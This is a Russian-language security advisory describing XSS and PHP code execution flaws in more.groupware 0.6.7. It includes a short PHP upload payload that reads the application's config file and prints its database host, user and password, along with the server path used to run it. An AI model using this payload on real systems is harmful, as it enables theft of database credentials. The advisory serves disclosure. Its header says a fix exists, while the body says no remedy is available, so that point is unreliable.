Security Lab

Межсайтовый скриптинг и выполенние PHP кода в 'more.groupware'

Дата публикации:30.06.2003
Дата изменения:17.10.2006
Всего просмотров:1045
Опасность:
Средняя
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Локальная сеть
Воздействие: Межсайтовый скриптинг
Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: more.groupware 0.x
Описание: Несколько уязвимостей в проверке правильности ввода обнаружены в 'more.groupware'. Удаленный пользователь может выполнить XSS нападение.

Сообщается, что приложение не фильтрует HTML код в данных, представленных пользователем в нескольких сценариях. Удаленный пользователь может внедрить специально сформированный HTML код, который будет выполнен в браузере целевого пользователя при просмотре злонамеренного сообщения.

Также сообщается, что удаленный авторизованный пользователь может загрузить PHP код типа:

<?php

include('../../../config.inc.php');

echo $appconf['dbvendor'];
echo $appconf['dbhost'];
echo $appconf['dbuser'];
echo $appconf['dbpassword'];
echo $appconf['dbname'];
?>
и затем выполнить его на сервере http://[target]/moregroupware/modules/files/store/file.php.

Уязвимость обнаружена в more.groupware 0.6.7

Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Multiple Vulnerabilities In Moregroupware